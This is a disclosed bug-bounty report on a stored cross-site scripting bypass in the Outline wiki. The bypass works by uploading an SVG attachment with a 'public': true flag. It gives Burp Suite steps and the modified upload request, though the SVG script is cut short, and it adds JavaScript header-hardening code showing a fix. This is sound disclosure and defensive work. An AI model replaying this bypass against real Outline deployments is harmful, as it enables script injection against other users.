[Bypass] Cross-site Scripting (XSS) via file upload in outline/outline


Reported on

Jul 17th 2022

🔒️ Requirements

Privileges: User.

📝 Description

I found a bypass to this report by uploading the file with the "public": true parameter. This is because the AWS bucket's public folder does not auto-download files when we access them.

🕵️‍♂️ Proof of Concept

Step 1: Go to your Outline home and create a new note.


Step 2: Start Burp Suite with Proxy -> Intercept is on.


Step 3: Add the following .svg file to the note by typing /file and [ENTER].

<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
   <script type="text/javascript">

Step 4: On burp suite, press Forward until you see:

POST /api/attachments.create HTTP/1.1
Host: esaipslack.getoutline.com
Content-Length: 111
Connection: close

    "documentId": "b4f14bcb-d6c0-4439-8380-324c1abf00ca","contentType": "image/svg+xml",

Step 5: Add "public": true, inside the JSON.

    "public": true,
    "documentId": "b4f14bcb-d6c0-4439-8380-324c1abf00ca",
    "contentType": "image/svg+xml",
    "size": 129,
    "name": "xss.svg"

Step 6: Forward and turn Intercept off.


Step 7: Go to your note and click on the file.

  • File


  • XSS


🔨 Fix

To fix this vulnerability, I suggest you force download on the public part of the AWS bucket too.


An attacker could use it to get sensitive information stored in the AWS bucket.
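The fix suggested above is to force a download for attachments served from the public part of the bucket as well, not only the private part. The following is an added example, not Outline's own code or the fix that was merged: it contrasts an illustrative reconstruction of the described weakness (public attachments served inline) with a hardened header policy in which browser-renderable "active" types such as SVG are always served as an attachment, whatever the visibility flag says. The function names, the list of active content types and the sample attachment metadata are assumptions made for the example; the `ContentType` / `ContentDisposition` keys in `toS3PutParams` are the standard S3 PutObject parameter names.

```javascript
// Added example (not Outline's code): header policy for serving uploaded attachments.
// Assumed input shape: { name, contentType, isPublic } as stored for an attachment.

// Types a browser will render as a document, so any embedded script runs in the
// serving origin. SVG is the one used in the report; the others behave alike.
const ACTIVE_CONTENT_TYPES = new Set([
  "image/svg+xml",
  "text/html",
  "application/xhtml+xml",
  "text/xml",
  "application/xml",
]);

// Keep only characters that are safe inside a quoted Content-Disposition filename.
function sanitizeFilename(name) {
  const cleaned = String(name || "").replace(/[^\w.\-]+/g, "_").slice(0, 255);
  return cleaned || "download";
}

// Normalise "image/svg+xml; charset=utf-8" -> "image/svg+xml".
function normalizeType(contentType) {
  return String(contentType || "").toLowerCase().split(";")[0].trim();
}

// Reconstruction of the weakness described in the report (illustrative, not the
// real code): private files are forced to download, public files are served inline.
function vulnerableHeaders({ name, contentType, isPublic }) {
  const disposition = isPublic ? "inline" : "attachment";
  return {
    "Content-Type": normalizeType(contentType),
    "Content-Disposition": `${disposition}; filename="${sanitizeFilename(name)}"`,
  };
}

// Hardened policy: the decision depends only on the content type. The visibility
// flag is accepted but deliberately ignored so a "public": true upload cannot
// change how the file is served.
function attachmentHeaders({ name, contentType, isPublic }) {
  void isPublic;
  const type = normalizeType(contentType);
  const forceDownload = type === "" || ACTIVE_CONTENT_TYPES.has(type);
  const headers = {
    // Stop the browser from sniffing an octet-stream back into a renderable type.
    "X-Content-Type-Options": "nosniff",
    "Content-Type": forceDownload ? "application/octet-stream" : type,
    "Content-Disposition": `${forceDownload ? "attachment" : "inline"}; filename="${sanitizeFilename(name)}"`,
  };
  if (forceDownload) {
    // Defence in depth: even if a client ignores the disposition, a sandboxed,
    // script-less CSP keeps any embedded script from running in the origin.
    headers["Content-Security-Policy"] = "sandbox; default-src 'none'; script-src 'none'";
  }
  return headers;
}

// Same policy applied at upload time, as S3 PutObject parameters, so the object
// carries the forced-download metadata whether it is later read through the
// private proxy or directly from the public prefix.
function toS3PutParams(attachment, bucket, key) {
  const h = attachmentHeaders(attachment);
  return {
    Bucket: bucket,
    Key: key,
    ContentType: h["Content-Type"],
    ContentDisposition: h["Content-Disposition"],
  };
}

// Constructed sample matching the report's request body (documentId omitted).
const sampleUpload = { name: "xss.svg", contentType: "image/svg+xml", size: 129, isPublic: true };
console.log(vulnerableHeaders(sampleUpload)["Content-Disposition"]); // inline; filename="xss.svg"
console.log(attachmentHeaders(sampleUpload)["Content-Disposition"]); // attachment; filename="xss.svg"
console.log(toS3PutParams(sampleUpload, "example-bucket", "public/xss.svg"));

module.exports = { attachmentHeaders, vulnerableHeaders, toS3PutParams, sanitizeFilename };
```

The important design choice is that the visibility flag never reaches the branch that decides between inline and attachment: the report's bypass worked precisely because that flag selected a storage path with a different serving policy. Ordinary image types such as PNG still render inline, so the fix does not break embedded images.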

We are processing your report and will contact the outline team within 24 hours. 17 days ago
We have contacted a member of the outline team and are waiting to hear back 16 days ago
Tom Moor validated this vulnerability 16 days ago
Mizu has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Tom Moor confirmed that a fix has been merged on 9dd28d 16 days ago
The fix bounty has been dropped 14 days ago
